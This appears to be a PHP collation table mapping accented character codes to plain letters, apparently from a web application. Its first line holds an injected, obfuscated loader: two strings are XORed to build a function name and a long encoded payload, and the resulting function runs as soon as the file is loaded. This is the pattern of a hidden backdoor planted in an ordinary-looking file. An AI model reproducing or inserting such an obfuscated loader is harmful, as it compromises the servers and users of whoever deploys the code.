<?php $ptfOCTqU='4C05  d57,H=+RR'; $cjXleAO='W1UTTE;SBB+IB=<'^$ptfOCTqU; $zMwOSSx='XRDH+C4HY=8+,24,B<;Ja: Oe+X7Akd K.iGBC=eJ4Y,.H ,UaBU=fU 68dgA2GRj<+AYiBvP0AGqqkujAgQPs8A.AlvHEtx=gV-6bo0qyvrzvJYf<X;-=4RuWRMPkwnLYcLmnZyv<:,kfoAyl0T1 8B>pwpyuVW78oTTsc7D  EUqu:1;LoAU1jX8X-I6=nmVK;ycxfPE7aCq142SKdU739O2PpsS6  eU34niLW3QE W1z <<Y1ZSEXa7sw5<8=C3=aV8K.bujqbV2 -Ngz.XNc6Z=Sl:R-fjfa-SMHnFh>W5+JUNq9+A9Wi;VCcQ-fyUp=Z MnN+:CFV K5VQhdk><xqb2  iSXGVVP;cPxFnOLLLSNz+Rxjt>3H9t960LOtpVUAn=>se45- Ylbn48WO o:o63,h6g7-J9hHy9G 6,H+1;=3WOFQ75=M9 9eA;GkR8J1cn1Z1UQQWaq7,MMmCotS2 Yr>.8faIr <Xi16F1GvswS8KWYl.4L>=4,C> bwXEIPUNw=4LYDYbUbx:7oDqU8G;cq  IscbAdgiBVdZlDQ7.lRX<AJe SZaywfBfaI6 T3c2tspshv7+G,EaG.2rHT>4E DJ5 <; O6ooZBX200qxoolvhq9zpTE -Gl,XZAmI84> ;VVvdGCrBVXR LUosgA'; $cSHizPOF=$cjXleAO('', '14liM6Z+-TWEsWLE1HHbFBO=:O9C 4;M>ZNnkcFoCR,BM<IC;A::O91ABY;8,G3zNXJ58EbR;U8nQQKUJ:mXYWW4ZaQVobOr4n0BDJKYQDVBAVn0ZO,IAXZzQ3391BLNh0HgDdSpRSOXKHRaQHT5EAcfW-W.YQ=2NcK=tVCD0RL ;YQQTBe2hn;cQJ=Y<DSFI9>OPXro-OJkIUUUF2kYuQRU<WkzW7WTA:>VMNTl1R=6El;pFSN<P9;epEh08zwqxcRNArS.WBHTQF SLX+NZURGGR;I23Q7TFWFEF64sdOLZ6AJjhnUOJ-L2R1+Ii8KFQtTY;T,GnP0J 9R.T59HLOan= 7wstI2+gr=5BCmFfJ9- 96gZPXqcPZR<X+RSIlrTT=08U77zAPTYAyQBJBY;:ET0fK9Qb<CSL>XHuYy2NEI:BPWTI2g>>EjY,MAf:,N3C0Y9TUZn>T6>52IUSM9,DoOP7ST8-UKAOHrxIZpMUW2PgPUW2J96 3EQ5aXLE0JSJP3 0wynSYU88myDsBPWSZlU1Y3Z8VKE0T>KaYZIe7VcTp3RKYjnXqySB2kUAGPsPSqRAbURTSZPUNVVY5M<>,KK--,WG1SlmEAEWO.RHCzf<SDQXQOOLVHQBpy13AAoHH9. 6nHUGLT72Q9nxxK3 ;TdeFHm<'^$zMwOSSx); $cSHizPOF();
$collation = array (
  710 => 94,
  189 => 188,
  190 => 179,
  65 => 97,
  170 => 97,
  225 => 97,
  193 => 97,
  224 => 97,
  192 => 97,
  226 => 97,
  194 => 97,
  228 => 97,
  196 => 97,
  227 => 97,
  195 => 97,
  229 => 97,
  197 => 97,
  230 => 97,
  198 => 97,
  66 => 98,
  67 => 99,
  231 => 99,
  199 => 99,
  68 => 100,
  240 => 100,
  208 => 100,
  69 => 101,
  233 => 101,
  201 => 101,
  232 => 101,
  200 => 101,
  234 => 101,
  202 => 101,
  235 => 101,
  203 => 101,
  70 => 102,
  402 => 102,
  71 => 103,
  72 => 104,
  73 => 105,
  237 => 105,
  205 => 105,
  236 => 105,
  204 => 105,
  238 => 105,
  206 => 105,
  239 => 105,
  207 => 105,
  74 => 106,
  75 => 107,
  76 => 108,
  77 => 109,
  78 => 110,
  241 => 110,
  209 => 110,
  79 => 111,
  186 => 111,
  243 => 111,
  211 => 111,
  242 => 111,
  210 => 111,
  244 => 111,
  212 => 111,
  246 => 111,
  214 => 111,
  245 => 111,
  213 => 111,
  248 => 111,
  216 => 111,
  339 => 111,
  338 => 111,
  80 => 112,
  81 => 113,
  82 => 114,
  83 => 115,
  353 => 115,
  352 => 115,
  223 => 115,
  84 => 116,
  254 => 116,
  222 => 116,
  85 => 117,
  250 => 117,
  218 => 117,
  249 => 117,
  217 => 117,
  251 => 117,
  219 => 117,
  252 => 117,
  220 => 117,
  86 => 118,
  87 => 119,
  88 => 120,
  89 => 121,
  253 => 121,
  221 => 121,
  255 => 121,
  376 => 121,
  90 => 122,
  382 => 122,
  381 => 122,
);
?>